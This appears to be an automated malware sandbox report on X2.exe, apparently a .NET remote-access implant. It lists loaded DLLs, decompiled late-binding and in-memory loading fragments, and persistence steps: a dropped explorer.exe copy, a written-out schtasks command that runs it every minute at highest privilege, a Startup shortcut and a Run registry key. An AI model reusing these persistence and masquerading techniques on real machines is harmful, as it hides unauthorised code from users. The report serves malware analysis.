Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: cryptbase.dll

Source: C:\Users\user\Desktop\X2.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: explorer.lnk.3.dr

LNK file: ..\..\..\..\..\explorer.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: X2.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: X2.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: X2.exe, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: X2.exe, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: X2.exe, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: explorer.exe.3.dr, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: explorer.exe.3.dr, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: explorer.exe.3.dr, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: X2.exe, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: X2.exe, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: X2.exe, Messages.cs	.Net Code: Memory
Source: explorer.exe.3.dr, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: explorer.exe.3.dr, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: explorer.exe.3.dr, Messages.cs	.Net Code: Memory

Source: C:\Users\user\Desktop\X2.exe	Code function: 3_2_00007FFE7E349AE2 push 8B48FFFFh; retf	3_2_00007FFE7E349AE7
Source: C:\Users\user\Desktop\X2.exe	Code function: 3_2_00007FFE7E3400BD pushad ; iretd	3_2_00007FFE7E3400C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFE7E21D2A5 pushad ; iretd	5_2_00007FFE7E21D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFE7E3300BD pushad ; iretd	5_2_00007FFE7E3300C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFE7E402316 push 8B485F92h; iretd	5_2_00007FFE7E40231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFE7E1ED2A5 pushad ; iretd	8_2_00007FFE7E1ED2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFE7E3000BD pushad ; iretd	8_2_00007FFE7E3000C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFE7E3D464D push edx; retf	8_2_00007FFE7E3D466A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFE7E3D2316 push 8B485F95h; iretd	8_2_00007FFE7E3D231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFE7E3D5EF5 push edi; retf	8_2_00007FFE7E3D5F1A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFE7E3D74D8 push ecx; retf	8_2_00007FFE7E3D74F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFE7E3D61B1 push edi; retf	8_2_00007FFE7E3D61B2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFE7E3D5621 push esp; retf	8_2_00007FFE7E3D5622
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFE7E1ED2A5 pushad ; iretd	11_2_00007FFE7E1ED2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFE7E3000BD pushad ; iretd	11_2_00007FFE7E3000C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFE7E3D2316 push 8B485F95h; iretd	11_2_00007FFE7E3D231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFE7E20D2A5 pushad ; iretd	13_2_00007FFE7E20D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFE7E3200BD pushad ; iretd	13_2_00007FFE7E3200C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFE7E3F2316 push 8B485F93h; iretd	13_2_00007FFE7E3F231B
Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 19_2_00007FFE7E3400BD pushad ; iretd	19_2_00007FFE7E3400C1
Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 22_2_00007FFE7E3100BD pushad ; iretd	22_2_00007FFE7E3100C1
Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 23_2_00007FFE7E3100BD pushad ; iretd	23_2_00007FFE7E3100C1
Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 24_2_00007FFE7E3100BD pushad ; iretd	24_2_00007FFE7E3100C1

Persistence and Installation Behavior

Drops PE files with benign system names

Source: C:\Users\user\Desktop\X2.exe

File created: C:\Users\user\AppData\Roaming\explorer.exe

Jump to dropped file

Source: C:\Users\user\Desktop\X2.exe

File created: C:\Users\user\AppData\Roaming\explorer.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\X2.exe

Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\user\AppData\Roaming\explorer.exe"

Source: C:\Users\user\Desktop\X2.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk

Jump to behavior

Source: C:\Users\user\Desktop\X2.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk

Jump to behavior

Source: C:\Users\user\Desktop\X2.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorer			Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorer			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
